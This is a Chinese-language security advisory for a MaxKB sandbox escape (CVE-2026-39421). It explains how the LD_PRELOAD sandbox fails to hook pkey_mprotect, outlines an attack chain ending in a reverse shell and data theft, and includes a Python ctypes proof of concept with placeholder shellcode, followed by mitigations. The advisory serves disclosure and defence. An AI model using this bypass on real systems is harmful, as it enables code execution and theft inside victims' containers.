CVE-2026-39421 MaxKB沙箱逃逸致代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-39421

漏洞类型

沙箱逃逸 / 代码执行

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MaxKB

漏洞概述

MaxKB是企业级开源AI助手，其2.7.1及以下版本存在严重的沙箱逃逸漏洞。该漏洞位于ToolExecutor组件，攻击者可利用Python的ctypes库直接发起原始系统调用，从而绕过基于LD_PRELOAD的sandbox.so模块限制。尽管沙箱拦截了execve、system及mprotect等关键函数以防止代码执行，但由于未拦截pkey_mprotect，拥有工作区权限的认证攻击者仍能分配可执行内存并执行任意代码，导致容器被完全攻陷及数据泄露。建议尽快升级至安全版本。

技术细节

该漏洞的核心在于MaxKB依赖的沙箱机制存在逻辑缺陷。系统通过LD_PRELOAD预加载sandbox.so库，利用Hook机制拦截Python进程的关键系统调用，如execve、system、connect和open。为了防止代码注入，沙箱还特别拦截了mprotect调用，禁止将内存页标记为PROT_EXEC（可执行）。然而，沙箱并未拦截pkey_mprotect系统调用。攻击者利用Python的ctypes库，可以直接调用内核接口，绕过Python层的Hook限制。通过pkey_mprotect，攻击者可以将包含恶意Shellcode的内存区域修改为可执行状态，进而跳转执行恶意指令，完全绕过沙箱的防御体系，实现容器内的任意代码执行。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者获取MaxKB应用程序的合法账户凭证，并拥有工作区访问权限。

STEP 2

步骤2：定位漏洞组件

攻击者访问ToolExecutor组件，准备提交包含恶意Python代码的任务。

STEP 3

步骤3：构造绕过载荷

攻击者编写Python脚本，利用ctypes库调用原始系统syscall，特别是使用未被拦截的pkey_mprotect来赋予内存执行权限。

STEP 4

步骤4：执行任意代码

通过修改内存属性并跳转到Shellcode执行，攻击者绕过LD_PRELOAD沙箱限制，在容器内执行任意系统命令。

STEP 5

步骤5：控制与窃取

攻击者建立反向Shell，完全控制容器环境，并窃取敏感数据或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-39421
# This PoC demonstrates bypassing the LD_PRELOAD sandbox using ctypes and pkey_mprotect.
import ctypes
import sys

# Constants for x86_64 architecture
SYS_pkey_mprotect = 330
PROT_READ = 0x1
PROT_WRITE = 0x2
PROT_EXEC = 0x4

# Shellcode placeholder (e.g., execve /bin/sh)
shellcode = bytes(b"\x90\x90\x90\x90") # Replace with actual shellcode

# Allocate memory buffer
buffer_size = len(shellcode)
# Use ctypes to create a writable buffer
libc = ctypes.CDLL(None)
addr = libc.valloc(buffer_size)
addr = ctypes.cast(addr, ctypes.c_void_p)

# Write shellcode to memory
ctypes.memmove(addr, shellcode, buffer_size)

# Bypass sandbox by using raw syscall for pkey_mprotect instead of mprotect
# Arguments: addr, size, prot, pkey (ignored usually if default)
# PROT_READ | PROT_WRITE | PROT_EXEC = 7
print(f"[*] Attempting to change memory protection at {hex(addr.value)}...")

# Execute raw system call via libc syscall wrapper
# Note: syscall number depends on architecture (330 for pkey_mprotect on x86_64)
result = libc.syscall(SYS_pkey_mprotect, addr.value, buffer_size, PROT_READ | PROT_WRITE | PROT_EXEC, 0)

if result == 0:
    print("[+] Memory protection changed successfully! Bypass successful.")
    # Cast to function pointer and execute (Theoretical execution)
    func = ctypes.cast(addr, ctypes.CFUNCTYPE(None))
    print("[!] Executing shellcode...")
    # func() # Uncomment to actually execute
else:
    print(f"[-] Failed to change protection: {result}")

影响范围

MaxKB <= 2.7.1

防御指南

临时缓解措施

如果无法立即升级，建议严格限制MaxKB工作区的访问权限，仅允许受信任的内网IP访问。同时，应在宿主机层面加强对容器行为的监控，特别是检测异常的内存修改操作和可疑的外联请求，以阻断潜在的利用行为。